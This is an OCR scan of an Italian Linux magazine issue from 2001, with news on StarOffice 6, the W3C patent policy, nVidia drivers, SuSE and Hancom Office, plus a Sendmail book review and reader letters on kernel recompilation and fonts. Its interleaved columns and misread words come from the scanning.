pubblico, fornire o comunque traf- Linux piuttosto che sulle tecnolo- Per maggiori informazioni: | 
ficare qualsiasi dispositivo digitale gie BSD, rende praticamente im- cryptome.org/sssca.htm | 
interattivo che non includa e utiliz- possibile certificarli secondo le di- www.wired.com/news/politics/ | 
zi tecnologie di sicurezza certifica- rettive SSSCA; in pratica, con que- 0,1283,46655,00.htm | 
ARRIVA STAR OFFICE 6! 
Disponibile in beta la versione 6.0 della più popolare office suite per Linux. 
a Sun ha iniziato la fase di beta ufficio, attualmente ferma alla produttrice, è probabilmente il 
IL testing per la prossima versione versione 5.2, la prima rilasciata dalla programma di questo tipo 
di Star Office, la 6.0. La suite per Sun dopo l'acquisizione della casa maggiormente utilizzato in ambiente 
Linux. 
EI <uncom La versione 6.0 offre la sparizione del 
TNA poco apprezzato “Desktop aggiuntivo” 
SELECT A TOPIC di Star Office, una migliore 
Home » Products & Solutions » Software > Desktop & Webtop > StarOffice 6.0 Beta integrazione con l'ambiente desktop | 
pe perr O) se DESKTOP AND WEBTOP dell'utente, l'utilizzo di un formato | 
>» What's New StarOffice® 6.0 Beta documentale basato su XML, e 
- Features, soprattutto un miglioramento dei filtri 
Functions & ai 5 e 
lic StarOffice” 6.0 Beta software is a preview “ dp on A IR Pe 
Rica sn of the next version of Sun's award-winning MS Cidea. Dai sp test VERA 
Requirements office productivity suite. The software sembra siano stati affrontati anche i 
eee i ia oe arnie 
» OpenOffice.org SS f xmi erp i nai i. dirusione Hei png la grande 
> Sun ONE Webtop , ec f] quantità di risorse utilizzate, 
RR principalmente in termini di RAM, e la 
i HIGHLIGHTS relativa lentezza, soprattutto in fase di 
= ipo Stories Key Applications: sarigamento: 
-Awards/Reviews The StarOffice 6.0 Beta productivity suite includes the following primary applicatiof ll rilascio della versione 6.0 finale è 
eroica e StarOffice[tm] Writer provides an easy-to-use word processing application proviata:par iaiinalo: 200%. 
- Programs and for HTML authoring, 
Rene Li sapa Cale provides comprehensive and highly programmable spreads| Per maggiori informazioni: 
ani uncions. www.sun.com/staroffice/6.0beta 
3960 
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Un nuovo Web, 


proprietario? 


Scatena polemiche la possibile nuova politica del W3C 


per l'utilizzo di tecnologie proprietarie sul Web 


el momento in cui scriviamo 

non è dato sapere quale sarà il 

responso del W83C, il comitato 
che si occupa dei protocolli standard 
utilizzati sul World Wide Web, 
sull'utilizzo di tecnologie brevettate. Ad 
agosto è stata resa pubblica per la 
ricezione di commenti una bozza di 
politica relativa ai brevetti. La scadenza 
per l'invio dei commenti era il 30 
settembre, prolungata all'11 ottobre a 
seguito della vibrata protesta dei 
rappresentanti della comunità open 
source. La nuova politica 
permetterebbe l'utilizzo di tecnologie 
brevettate, purché queste siano rese 
disponibili in maniera “ragionevole e 
non discriminatoria” (RAND, 
dall'inglese “reasonable and not 
discriminatory”). Il problema, 
naturalmente, è che in generale è 
impossibile per le implementazioni 
open source utilizzare tecnologie 
brevettate, dal momento che la 
definizione stessa di open source e di 
software libero impone la libera 
redistribuibilità gratuita. Inutile dire che 
questo lascerebbe il campo 
completamente sgombro a prodotti 
proprietari quali Internet Explorer, 


wc 


W3C Patent Policy Framework 


WS3C Working Draft 


\W3C Working Draft 16 August 2001 


This Version: 


permettendo la realizzazione di pagine 
visualizzabili solo tramite programmi 
non liberi. Tra i rappresentanti della 
comunità software libero e open 
source che hanno espresso il proprio 
dissenso con l'invio di commenti al 
W83C spiccano i nomi di James Clark, 
lan Clarke, Alan Cox, Theo de Raadi, 
Eben Moglen, Tim O'Reilly, Bruce 
Perens, Richard Stallman, Andrew 
Tridgell, e molti altri. Un analogo 
dissenso è stato espresso da alcune 
società, prima fra tutte la Hewlett- 
Packard (un rappresentante della 
quale, tra l'altro, figura tra gli autori 
della bozza!), e da analisti della Gartner 
Group. La “Open Source Iniziative” ha 
espresso forti preoccupazioni per la 
proposta, indicando comunque come 
possibile via d'uscita l'esenzione dei 
prodotti liberi dal pagamento dei diritti 
sull'utilizzo delle tecnologie brevettate. 
La decisione finale del W3C sulla 
questione è attesa per febbraio 2002. 


Per maggiori informazioni: 
www.w3.0rg/TR/2001/WD-patent- 
policy-20010816 
Iwn.net/2001/1004/a/w3c-patents.php3 
www.openphd.net/W3C_Patent_Policy 


http//www.w3.org/T R/2001/WD-patent-policy-20010816/ 
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LIBERTÀ, MA 
DI CHI? 


| grandi nomi dell'open 
source e del free software 
si confrontano sul tema 
della libertà degli utenti 

e dei programmatori 


li ideali del software libero e 

dell'open source si sono ancora una 

volta confrontati nel corso di un 
interessante dibattito che ha visto schierarsi 
da un lato Bradley Kuhn e Richard Stallman 
della Free Software Foundation, dall'altro Tim 
O'Reilly, dell'omonima casa editrice, con un 
intervento “a latere” di Eric Raymond. Il 
dibattito si concentra sull'uso di termini come 
“libertà” e “potere”, ma le conclusioni più 
interessanti sembrano potersi riassumere 
osservando della libertà di chi ci stiamo 
occupando. Kuhn e Stallman sembrano voler 
guardare contemporaneamente alla libertà di 
tutti gli utenti di computer; per massimizzare 
la libertà di tutti, sostengono, tutto il 
software scritto da qualunque 
programmatore dovrebbe essere libero. 
O'Reilly e Raymond sembrano guardare alla 
libertà individuale, e notano che per imporre 
un determinato tipo di licenza occorre 
restringere in maniera inaccettabile la libertà 
dei programmatori. Secondo O'Reilly la 
libertà di base è quella del programmatore 
che può scegliere quale licenza adottare per il 
proprio software; Raymond sottolinea che 
questa non comporta restrizioni per nessuno, 
mentre l'ideale di Kuhn e Stallman può essere 
raggiunto solo con forti imposizioni ai 
programmatori. Sebbene in passato entrambi 
i movimenti abbiano negato qualunque 
orientamento politico, la tendenza liberale 
dell'open source non è mai stata così 
evidente; così come le posizioni della FSF 
fanno pensare a una volontà di controllo su 
tutto il software prodotto, e sembrano 
rimandare a regimi oramai poco diffusi. 


Per maggiori informazioni: 
linux.oreillynet.com/pub/a/linux/2001/08/ 
15/oreilly_response.html 
linuxtoday.com/news_story.php3? 
Itsn=2001-08-17-016-20-OP-CY 


N E WS 


Driver proprietari, un peso 
per gli sviluppatori liberi’? 


NVidia rilascia la nuova versione dei suoi driver proprio mentre Alan Cox 
cerca di evitare di doverli supportare. 


| ormai più di un anno che 

nVidia, casa produttrice di 

chip grafici, ha iniziato a 
rilasciare driver per Linux. 
L'ultima versione è stata rilasciata 
a settembre, e funziona con una 
vasta gamma di processori grafici. 
In effetti i sistemi basati su nVidia 
funzionano egregiamente anche 
con una normale installazione di 
XFree86. Inoltre, l'utilizzo di driver 
proprietari, non liberi, è 
consigliata solo a chi sia convinto 
di cavarsela bene da solo con il 
suo sistema. Alan Cox, il numero 
due dello sviluppo di Linux, ha 


aggiunto un sistema di 
“marcatura” dei moduli con lo 
scopo specifico di riconoscere i 
“bug report” derivanti da sistemi 
su cui sia stato caricato un driver 
proprietario. In altri termini, 
l'utilizzo di un driver proprietario 
“macchia” il kernel e rende i 
messaggi di errore (in gergo, gli 
“oo0ps”) facilmente riconoscibile 
dagli sviluppatori cui venga 
chiesto aiuto. 

Nelle parole di Alan Cox: “Mi 
arrivano tanti bug report causati 
dai moduli nvidia da parte di 
gente che mente quando gli si 


chiede se li hanno usati, che 
dovevo prendere qualche 
precauzione, altrimenti dovrò 
smettere di leggere i bug report di 
chiunque io non conosca di 
persona. 

Non sono pronto a diventare un 
membro non pagato del personale 
di supporto nVidia”. 


Per maggiori informazioni: 
www.uwsg.indiana.edu/hypermail/linux/k 
ernel/0109.0/0631.html kt.zork.net/kernel- 
traffic/kt20010917_133.html#4 www.nvi- 
dia.com/view.asp?lOz=linux_readme_install 


MOSSA SUICIDA DI MICROSOFT SULLE LICENZE? 


Le nuove strategie del gigante informatico scatenano le ire degli industriali britannici. 


industriale “The Infrastructure 

Forum” ( tif ) ha richiesto al 
Dipartimento del Commercio e 
dell'Industria un'indagine sui nuovi 
schemi di licenza della Microsoft. 
Secondo il gruppo, i cui 98 membri 
spendono annualmente qualcosa come 
28 miliardi di Euro (sì, sono proprio 
54mila miliardi di lire!) in tecnologie 


| n Gran Bretagna l'associazione 


informatiche, il gigante dell'informatica 


sta utilizzando la propria posizione di 
monopolio per imporre ai clienti 
aumenti di prezzo ingiustificati. 
Un'indagine tra i membri del forum 
indica un incremento di spesa pari a 
circa il 94%, cioè quasi un raddoppio. 
L'organizzazione ha anche 
programmato una campagna pubblica 
di informazione, e sta preparando un 


fatturato, per investigare le possibili 
alternative ai prodotti Microsoft. 
Alcune società hanno già iniziato a 
investigare la possibilità di migrare a 
servizi basati su Linux. 


E gn 
Aka questio 


1, Using the private members only tf. 
Services, funded solely from modest 


in costs under Micrasolt's preposed 
Licensing chenges. 

2 The QA attracted 15 responses all 
cnticel of the scheme. 


3. The sudbsequent Membero' Workshop on 
maînly 


represi 
Ch ppt (See What 
cani do ferine? 

4. The Workshop conchided the problem 
was very widespread and more costy 
than first impressions indicated 

S. The group elected five of the delegates 
ERÙ SR A 


questionario tra i suoi membri, tra le 
quali sono presenti 47 delle 100 
compagnie britanniche con maggior 


Per maggiori informazioni: 

www.tif.co.uk 
techupdate.zdnet.com/techupdate/ 
stories/main/0,14179,2816210,00.html 
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L'ufficio coreano 


alla 


conquista degli USA 


La popolare software house coreana “Hancom" 
prepara le alleanze per entrare nel mercato 


statunitense ed europeo. 
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ella battaglia per l'afferma- 
N zione tra le “suite” per uffi- 

cio sul desktop Linux c'è un 
concorrente poco noto ma agguer- 
rito. 
La compagnia coreana 
HancomLinux produce un softwa- 
re denominato, manco a dirlo, 
“Hancom Office”, che ha una buo- 
na diffusione nel mercato asiatico 
e ha ottenuto buone recensioni 
nel mondo Linux. 
La recente alleanza con 
theKompany, che offre supporto 
per sistemi desktop Linux basati 
su KDE, è indicativa della volontà 
di espansione sul mercato statuni- 
tense ed europeo, e appare natu- 
rale dal momento che Hancom 
Office è basato sulle librerie Qt, 
utilizzate in KDE. La versione at- 
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tuale di HancomOffice, la 1.5, 
comprende un Word processor, un 
foglio elettronico, uno strumento 
per presentazioni e un editor di 
immagini, ed è in vendita a 45 dol- 
lari (in inglese, a meno che non 
siate interessati alle lingue asiati- 
che!). 

La versione 2.0, che dovrebbe es- 
sere disponibile a novembre 2001, 
includerà inoltre un database per- 
sonale, un editor per diagrammi, 
uno strumento per html e una ru- 
brica. 


Per maggiori informazioni: 
www.hancom.com 


IL MAGO 
E | SUPER 
COMPUTER 


La Hewlett-Packard 

e l'INRIA presentano 
una semplice ricetta 
per la realizzazione 

di un supercomputer, 
basato su Mandrake 7. 


rendete un paio di centinaia di PC 
P non nuovissimi, con dotazione 

standard e senza schermo. 
Aggiungete una manciata di switch e 
qualche cavo. Installate Mandrake 7, con 
qualche piccola aggiunta che faciliti gli 
aggiornamenti software. Con una spesa 
totale di neanche 250'000 Euro, entrerete 
nella classifica dei 500 computer più 
veloci del mondo. Se poi sfruttate il 
lavoro già effettuato dalla HP di Grenoble 
e dall'Istituto Nazionale di Ricerca 
Informatica francese INRIA, che verrà 
rilasciato a breve come software libero, 
potrete risparmiarvi anche lo sviluppo 
delle aggiunte necessarie per la gestione. 
Il progetto, denominato |-Cluster, ha 
utilizzato 225 computer HP di tipo e-PC, 
con Pentium Ill a 733 MHz, 256 MB di 
RAM e 15 GB di Hard Disk; il calcolatore 
risultante è classificato 385esimo nella 
classifica dei 500 supercomputer più 
veloci del mondo. 


Per maggiori informazioni: 
news.cnet.com/news/0-1003-200- 
7409795.html?tag=mn_hd icluster.imag.fr 
www.t0p500.org 
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Suse, 
l'ottimismo della 
ristrutturazione 


Il popolare distributore tedesco 
approfitta del completamento di un 
giro di finanziamenti per annunciare 
anche una serie di licenziamenti. 


‘è chi preferisce sentire prima le buone noti- 

zie e poi quelle cattive, chi il contrario; l'im- 

portante, comunque, è di non averne da an- 
nunciare solo di cattive. Questo almeno è quello 
che sembrano pensare alla SuSE, dove per annun- 
ciare il prossimo licenziamento di 120 dipendenti 
(su un totale di 500 nelle varie sedi mondiali) han- 
no atteso di poter annunciare contemporaneamen- 
te anche di aver appena messo in cassa contante 
per 15 milioni (di Euro, s'intende). Il gruppo che 
ha finanziato la SuSE comprende investitori del 
calibro di Accenture, Beisheim Holding, Deutsche 


SuSE Linus and Uogic Arance 
" Entesprise Storage Solutfona fo 
Lins (10/17/2001 


) 
SUSE 7.3 Supported by QLogic SAN 
Infrastructure Solutions 


Linux 7 3 for integration into SAN 
solutions for original equipment 


Bank, La Caixa, e SAP, il cui appoggio va comun- 
que ritenuto estremamente significativo. 

Inutile dire che “l'adattamento della struttura or- 
ganizzativa” della SuSE è motivato dalla necessità 
di “andare incontro alla domanda dei differenti 
gruppi di clienti”, che “a seguito di questa concen- 
trazione strategica” la SuSE “continua il percorso 
di consolidamento iniziato la scorsa estate”. In 
Europa come negli Stati Uniti, all'euforia dello 
scorso anno fa seguito il ritorno alla effettiva 
realtà economica. 


Per maggiori informazioni: 
www.suse.com/us/suse/news/PressReleases/invest- 
ment.html 
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Base 
Amministrazione 
Rete 


Certificazione LPI 


Calendario Corsi 


Per conoscere i programmi dettagliati dei corsi SuSE, le condizioni e le 
modalità di iscrizione consultate la nostra pagina web. | prezzi indicati 
si riferiscono al prezzo complessivo di un corso per singolo partecipante. 


Cono. Base cciricciceazonniizaconasnziozanno 03-04/9, 22-23/10, 25-26/10 
È 515 (Va esclusa). «nori 19-20/11, 22-23/11, 03-04/12 
Amministratore di sistema..................rrrrrrrereerere 12-14/9, 17-19/10 
E F110! (IVA BSCIUSA) scr 29-31/10, 27-29/11 
Amministratore di Rete | (Intranet)........................% 17-21/9, 01-05/10 


€ 1850 (iva ESCIUSA) ............... est «e. 05-09/11, 10-14/12 


Amministratore di Rete Il (Internet) ....................... 24-28/9, 08-12/10 
e 18:0(Vva esclsp)a cenni 12-16/10, 17-21/12 


Corsi personalizzati 


SUSE Italia offre anche percorsi formativi su misura, adatti alle vostre 
conoscenze e alle vostre esigenze. Contattateci telefonicamente o 
tramite e-mail per richiederci preventivi per un corso in-house, 
direttamente presso la vostra sede, o per un corso ad aula chiusa, 
presso la nostra struttura ma riservato esclusivamente ai vostri tecnici. 


Certificazioni LPI 


SuSE Italia è oggi in grado di offrire la certificazione — indipendente 
dalle distribuzioni — del Linux Professional Institute, riconosciuta a 
livello internazionale come la certificazione di riferimento per il sis- 
tema operativo Linux. Chi è 
interessato, potrà sostenere 
gli esami LPI direttamente 
presso la nostra sede, per 
dotarsi di una qualifica 
professionale che gli apra le 
porte del nuovo mercato 
Open Source. 


Approfittate dello speciale 
sconto riservato ai lettori di 
Linux Magazine! 


Presentando questo coupon avrete 
diritto ad una riduzione del 15% 
sul'iprezzo dei corsi. La promozione 
è valida fino al 31/10/2001. 


LINUX 
TRAINING 


SuSE Linux s.r.l. 

Via Montanara 26 

41051 Castelnuovo Rangone (MO) 
Tel. 059 539 581 - training@suse.it 
www.suse.it/training/index.html 


SENDMAIL (2° EDITION) 


Sendmail è uno dei 
quattro programmi che 
hanno decretato, da 
soli, il successo 
dell'approccio Open 
Source all'informatica. 
Presente su oltre 
l'80% dei server di 
posta internet è in 
assoluto il programma 
free con la maggiore 
percentuale relativa di 
"mercato", pur non 
essendo sul "mercato", 
ma assolutamente 
libero. E' il sistema di 
posta praticamente 
standard, già da molti 
anni, su tutti i vari 
sistemi Unix anche 
proprietari e per 
funzionalità e 
flessibilità non ha 
paragoni con nessun 
altro programma del 
genere. 


ASPETTI GENERALI 


Per Utenti Avanzati 


Ciò nonostante è un 
programma ostico e 
difficile. Per condurlo 
ad un funzionamento 
accettabile bastano di 
solito le configurazioni 
standard che sono 
molto facilmente 
reperibili, ma per 
realizzare 
eventualmente le sue 
complesse possibilità 
di gestione della posta 
è necessario entrare in 
profondità nella sua 
complessa struttura a 
strati. 


coco 
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di Bryan Costales con Eric Allman 
Edito da: O'Reilly & Associates 


Scheda 


Titolo: SENDMAIL 
(2ND EDITION) 
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Eric Allman 
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Prezzo: 49,95 Dollari 
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Argomenti: Configurazione, 
Amministrazione di 
Sendmail per la 
realizzazione e 
collegamento di sistemi di 
posta elettronica 


Edito da: O'Reilly & 
Associates 


L'editore: Il mito degli 
editori americani nel 
campo dell'Open Source. 


Lingua: Inglese 


Leggibilità e Stile 


Giunto alla seconda 
edizione e la settima 
ristampa, dal 1993 
questo è di gran lunga 
il più affidabile e 
completo riferimento 
mai scritto su 
sendmail, che 
nonostante sia il 
software per server di 


posta più usato in 
assoluto rimane uno 
dei meno conosciuti e 
più difficili da imparare 
e conoscere. 


ASPETTI SPECIFICI 


La prima parte del libro 
contiene un tutorial 
completo sulla 
configurazione del 
programma per 
raggiungere una ottima 
comprensione dei suoi 
meccanismi di 
funzionamento. 

La seconda parte 
mostra la costruzione, 
l'installazione e la 
configurazione 
attraverso il 
programma m4. 

La terza parte mostra 
alcuni problemi pratici 
risolti attraverso l'uso 
del programma. 

La quarta parte 
comprende una guida 
di riferimento 
completa ed esaustiva 
e infine la quinta parte 
contiene alcune 
appendici e una 
completa bibliografica. 


GLI AUTORI 


Bryan Costales è 
direttore delle 
tecnologie presso la 
Mercury Mail di 
Denver in Colorado. 
E' amministratore di 
sistema da oltre 15 
anni e scrive libri ed 
articoli da oltre 10 
anni. 


Eric Allman, invece, è 
l'autore originale di 
sendmail, ha 
contribuito moltissimo 
allo UNIX di Berkley e 
ha scritto tante altre 
utility di sistema come 
tset, trek, syslog e 
vacation. 


L'EDITORE 


Il mito degli editori 
americani nel campo 
dell'Open Source. Non 
solo la sua produzione 
copre pressocchè tutti 
gli aspetti tecnologici, 
ma ne è anche 
direttamente uno dei 
principali promotori. 


CONCLUSIONI 


Questo libro è 
necessario se il vostro 
lavoro è quello di 
gestire il server di 
posta, assolutamente 
necessario se state 
avendo dei problemi, 
insostituibile se volete 
iniziare a capire questo 
software che nè la 
maturità, nè la 
difficoltà di gestione e 
configurazione sembra 
riuscire a scalfire, 
sebbene dal 1979 tanti 
(e forse troppi) si sono 
cimentati nella 
ennesima riscrittura di 
un sistema alternativo 
che dovesse 
soppiantare proprio 
sendmail. 


COMPLETO 


Divertitevi 
do 


nemici | 


volanti in 


MALL LL: i 
l trucchi ed i suggerimenti per 


| perfette le vostre foto digitali. 


fruttare al massimo i motori 
di ricerca 


‘ ani Î 


| da Stil lare 


2 CD-Rom + 


1 Gioco Completo - 
3 software completi + 


oltre 70 Software + 
1 speciale sui programmi di fotoritocco + 


13 Scopriamo perché il nuovo AMD 
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e il processore 


Dalla fotocamera da polso al visore per reaîtà virtuale... 
-«Eli oggetti del desiderio di fine anno 


Cromatika 


Il bello del 
Pinguino... 


Carissimi lettori di 
LinuxMAGAZINE, siamo 
molto contenti 
dell'interesse, che state 
dimostrando per la 
rivista! Come sempre 
siamo contenti di darvi la 
possibilità di approfondire 
alcuni aspetti della "linux- 
way" alla filosofia di 
sistema e alle possibilità 
di crescita personale che 
vengono messe a 
disposizione di chi si 
incammina lungo la "via 
del pinguino...". Quindi 
continueremo a 
rispondere alle mail 
inviate all'indirizzo 
linuxmag@edmaster.it 
(sintetizzandole per avere 
più spazio per le risposte), 
cercando di approfondire 
gli argomenti o le 
curiosità di interesse più 
generale. 
linuxmag@edmaster.it 
Ovviamente, per motivi 
riguardanti la privacy, 
riporteremo nomi e 
indirizzi di e-mail dei 
lettori che ci hanno scritto 
esattamente come 
riportato in fondo 

alla lettera. 


da: Paolo 


Chicche sui 
malfunzionamenti 
Windows 


Porto Redazione, ho 
letto l'articolo 


"Oggetto: Ho due PC..." 
su Linux Magazine di 
Ottobre - Novembre 
2001 e mi sono divertito 
moltissimo, credo di 
essere tra la schiera di 
quei davvero pochi che 
usano Linux e si diverte 
ad appendere nella bache- 
ca dell'ufficio qualsiasi 
avviso di bug di windows. 
-P 

La mia storia è ancora più 
divertente: a casa ho due 
computer e con l'idea di 
collegarmi con l'ADSL di 
Telecom, ho installato 
Windows 98 perché la 
configurazione data era 
solo quella e non sapendo 
il comportamento di linux 
in merito volevo essere 
sicuro di vederla funziona- 
re. 

Premetto che erano 8 
mesi che operavo con 
linux e tutto andava 
benissimo, anche con 
internet. Dopo la relativa 
installazione e configura- 


| Blackbox 


zione, ho aggiornato 
anche l'antivirus delle 
Norton, quindi ho iniziato 
a fare qualche prova. 
Tutto bene fino al 3° gior-. 
no, poi l'hard disk impaz- 
zisce, il computer si pian- 
ta, il secondo disco (in 
Linux) si scollega, 
Windows inizia a dare una 
serie di errori sempre più 
catastrofici. All'ennesimo 
riavvio, errori di continuo 
con la omnipresente 
richiesta di premere 
ctrl+alt+del... così via fino 
al punto di "sistema ope- 
rativo inesistente". Ehi! 
Non vi dico il panico! 
Cerco di entrare nella par- 
tizione di Linux e sorpre- 
sa: danni a iosa, il siste- 
ma fa a fatica ad avviarsi 
e si pianta. Panico! Cerco 
di reinstallare Windows e 
Linux: l'installazione si 
ferma, si blocca il compu- 
ter si riavvia da solo (ma 
chi gli ha detto di farlo?) e 
così via per 2 settimane! 
Dopo prove su prove 
decido di portarlo da un 
tecnico: danni alla mother 
board (bios) e all'hard disk 
- Si denota un virus letale 
nella traccia zero! Si deci- 
de quindi per la sostituzio- 
ne (600.000) con nuova 
CPU, perché la mia era 
troppo vecchia (una AMD 
PIII-450) e 
non si trova- 
vano le 
schede 
madri. Ora 
ho ripreso in 
mano linux e 
navigo con 
l'ADSL con 
grande pia- 
cere e un 
po' di rimor- 
so per i pro- 
grammi free 
-abituato 
come ero a 
pagare fior 
di quattrini 
per win- 
dows- e con 
la speranza 
che Bill 


possa un giorno raccoglie- 
re almeno il 10% di tutti 
gli accidenti che gli man- 
dano i suoi clienti ed 
utenti! 
Una seconda chicca! 
Mi hanno regalato la web- 
cam III della creative 
USB, installata su 
Windows 98 non ha solo 
mancato il riconoscimento 
del sistema hardware, ma 
ha messo in conflitto il 
sistema operativo fino al 
suo completo crash. 
Mentre linux ha ricono- 
sciuto immediatamente la 
webcam e l'ha fatta fun- 
1!!! Per quello che mi 
riguarda auguro a tutti i 
"pinguini" vita lunga! No! 
Lunghissima! Un saluto 
cordiale a tutti. 

Paolo 


Da: Gaetano 


Oggetto: Problemi 
di Font 


fao sono Gaetano. 

Grazie alla vostra rivi- 
sta mi sto avvicinando 
(molto lentamente pur- 
troppo) all'immenso 
mondo Linux. Per questo 
vorrei ringraziarvi. Ma 
come ogni buon 
"“NewBye" che si rispetti 
ho i miei primi problemuc- 
ci. Ho installato Linux- 
Mandrake 8.0 e ne sono 
contento, ma purtroppo, 
soprattutto nelle pagine 
web che vado a visitare, 
riesco a mala pena a 
distinguere i caratteri con 
uno sforzo incredibile per 
gli occhi. (preciso che il 
problema non è solo per 
le pagine web ma è diffu- 
so) Possiedo una scheda 
video Asus 7700 (ricono- 
sciuta come Nvida 32 Mb 
DDR generic) con monitor 
LG Flatron 775. Ho impo- 
stato la risoluzione a 
800X600 a 65000 colori. 


da: Giulio Ciuffi Vampa 


Ricompilare i kernel 


alve, sono un appassionato let- 

tore della vostra rivista e vor- 

rei farvi tuttavia delle critiche 

su alcuni servizi del Passo-Passo. | 
servizi che vi riportate sono interes- 
santissimi e utilissimi, ma dato che 
serve effettuare la ricompilazione del 
kernel (come nel caso dell'ultimo 
numero con lo Scanner o nel caso 
del numero 13 con la webcam), non 
è che potreste spiegare come si può 
fare? In particolare volevo 
chiedere:si può prendere l'immagine 
del kernel installato e modificarla 
solamente invece di riconfigurarlo 
da zero ogni volta che devo cam- 
biarlo? E poi: è necessario reinstal- 
larlo ogni volta dopo averlo compi- 
lato e creato l'immagine? E infine: ci 
sono dei particolari a cui bisogna 
stare attenti durante la configurazio- 
ne, che possono bloccare 

il "make bzImage"? Grazie tante e 
aspetto la vostra risposta. 

Ah, complimenti per la rivista: molto 
ben organizzata!! 

Giulio Ciuffi Vampa 


Le ricompilazione del kernel è una 
operazione delicata che tratteremo 
in modo approfondito su uno dei pros- 
simi numeri. Con le attuali distribuzioni 
è raramente necessaria quando si trat- 
ta di inserire un nuovo modulo. Infatti 
spesso basta caricalo dall'esterno del 
kernel attraverso il comando insmod, 
anzi spesso il kernel se ne ha bisogno 


lo carica autonomamente, proprio 
come se fosse stato compilato all'in- 
terno. L'unico motivo per cui è ancora 
necessario ricompilare il kernel sta 
nella necessità di attivare opzioni o 
modalità di funzionamento "strane", 
che spesso riguardano i moduli più che 
il kernel stesso. Anche in questo caso 
è forse sufficiente ricompilare solo i 
moduli dopo la riconfigurazione, con 
'make modules' e reinstallarli con 
'make modules_install' e, di nuovo, 
usare i comandi 'rmmod' e ‘insmod' 
per ricaricarli. 

La complessiva ricompilazione del 
kernel e la sua reinstallazione, per un 
utente interessato a lavorare con 
Linux, è una esigenza abbastanza rara. 
In ogni caso, per rispondere alle tue 
domande, le distribuzioni recenti 
mantengono nel file di configurazione 
del sorgente del kernel l'immagine 
delle configurazioni effettivamente 
inserite nel kernel in uso. Sarà quindi 
necessario cambiare solo le opzioni 
richieste senza toccare null'altro per 
riavere il kernel precedente con quelle 
modifiche. 

E' sempre necessario reinstallare il 
kernel se le modifiche lo riguardano, 
se invece le modifiche riguardano i 
moduli basta compilare e installare 
solo questi ultimi. Infine... bisogna 
stare attenti a tutto quello che si 
modifica quando si riconfigura il kernel 
perchè qualunque cosa può 
potenzialmente bloccare non tanto 
l'operazione di 'make', che in linea di 
massima porta sempre ad un risultato 
positivo, quanto in fase di reboot della 
macchina con il nuovo kernel 
compilato, quindi bisogna sempre 
avere una soluzione di reboot con un 
kernel alternativo e funzionante. 


Ma anche con altre risolu- 
zioni il risultato non cam- 
bia. 
Vi prego di darmi una 
mano, non vorrei abban- 
donare tutto per uno stu- 
pido problema di grafica. 
Grazie, attendo con ansia 
una vostra risposta. 
PS.: se posso dare un 
piccolo consiglio (da ine- 
sperto) usate il browser 
testuale. 
Decolla!! 

Gaetano 


a gestione dei font in 

X-Windows è uno degli 
argomenti in generale più 
complessi dell'intero 
ambiente. E' molto diffici- 
le trattare compiutamente 
la questione e non esisto- 
no "trucchi" per evitare 
alcuni problemi senza una 
corretta configurazione 
del sistema. Comunque il 
problema indicato potreb- 
be essere dovuto a due 
diversi problemi. 
Nell'ambiente KDE non è 


definito di default l'antia- 
liasing dei caratteri (cioè 
la tecnica software per 
evitare la scalettatura 
delle linee oblique tramite 
opportune sfumature di 
colore) che va attivata nel- 
l'apposito pannello del 
programma di configura- 
zione. Per quanto riguarda 
i programmi che usano 
font troppo piccoli (ad 
esempio Netscape fa que- 
sto scherzo) è sufficiente, 
laddove possibile, indicare 


nei propri pannelli di con- 
figurazione l'uso di font 
un po' più grandi (da 12 o 
14 punti) privilegiando 
quelli "scalabili" selezio- 
nandoli eventualmente 
con le utility kfontmana- 
ger o xfontsel. 


Da: Luigi Chatel 


Oggetto: Appunti 
su StarOffice 


leer per la 
rivista! Salve a tutti, 
sono un maestro elemen- 
tare di Torino e sto pro- 
vando a diffondere il 
software libero nella 
scuola in cui lavoro. A dire 
il vero sto curando un pro- 
getto di scuole in rete che 
coinvolge sette plessi di 
tre livelli di scuola diffe- 
renti. Ovviamente, come 
avviene sovente nella 
scuola, io per primo sono 
un semineofita (mio 
cognato grande informati- 
co si spaventa ogni volta 
che mi vede "armeggia- 
re"...). 
Per iniziare volevo propor- 
re la suite di staroffice in 
alternativa ad office. 
Chissà se qualcuno ha a 
disposizione degli appunti 
o delle dispense che pos- 
sano risparmiarmi un po' 
di lavoro nella preparazio- 
ne del corso base? 
Ringrazio anticipatamen- 
te... 

Luigi Chatel 


Per contattarci: 


e-mail: 
linuxmag@edmaster.it 
Fax: 09848319225 
Posta: 

Edizioni Master, 

C.da Lecco, zona 
industriale - 87030 
Castiglione Scalo (CS) 
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ooo 
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Durata 
104 min 
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Phil Davis 


Fotografia 
x_ARI Cinders Forshaw 


Protagonisti 
Christine Tremarco 
Stuart Sinclair Blyth 
Sheila Hancock 


Musiche 
Peter Vettese 


filmimperdibile! 
Rivista + DVD solo L.14.900 


Una ragazza che fugge dal suo passato di 
abusi sessuali e un eco-terrorista 
ricercati dalla polizia vengono aiutati da 
Vera, ex agente dell'esercito britannico, 
gravemente ammalata. 

Il vaggio verso l’ultimo tramonto della “ex 
soldatessa” insegnerà loro un sacco di 
cose, soprattutto su se stessi. 
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utti (0 quasi) avranno ormai 
T sentito parlare di .NET la 
nuova piattaforma di casa 
Microsoft che mira (di fatto) a 
soppiantare Java e togliere alla 
Sun il predominio delle 
applicazioni Web. 

Ricordiamo brevemente di cosa 


| si tratta, per poi vedere sul 
versante free software, cosa 
sta accadendo. 


.NET 


Tempo fa, ad una presentazione di 
.NET, la “Visione” di Microsoft per 
la piattaforma .NET veniva presentata 
come “Empower people through 
great software, any time, any place, 
and on any device”. A parte i conno- 
tati di marketing la frase riassume 
bene i concetti chiave: si vuole crea- 
re un software che permetta a chiun- 
que, ovunque si trovi e con qualsiasi 
dispositivo a sua disposizione (palma- 
re, cellulare, PC...) di sfruttare le 
applicazioni disponibili. Applicazioni 
che, per forza di cose (visto che i 
dispositivi sono vari e con diverse 
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Non solo 


In principio era .NET, 
a quando DotGNU? 


ET 


“Microsoft > 
NET 


.NET Defined 
.NET Overview 

Curious about what .NET is? Learn all aboutitin this 
overview, 


i t 
\ MSDN Web Site 


Microsoft® . On November 6 or 8, in 32 U.S. g 
|/Developer Days insights on.NET development 


72001 and technologies, including th 
PRAIA of Microsoft Visual Studio® . 
—— a - conference is $99. Registe! 


Microsoft Press 
Jumpstart .NET with 
essential reading from 
Microsoft Press. 


Dntonte NET 


a My Services Weh site CS PAL 
.NET My Services, Microsoft’s first XML Web service vert 


Training 

.NET Training Web sites codenamed "HailStorm," puts youin control of your op CA? 

Get XML Web services skills , Leam how, 

by choosing intensive, 7 


ostruzione ded, or self-paced 


Figura i 
Home page di Microsoft.NET 


caratteristiche di potenza di calcolo e 
memoria disponibile) non sono resi- 
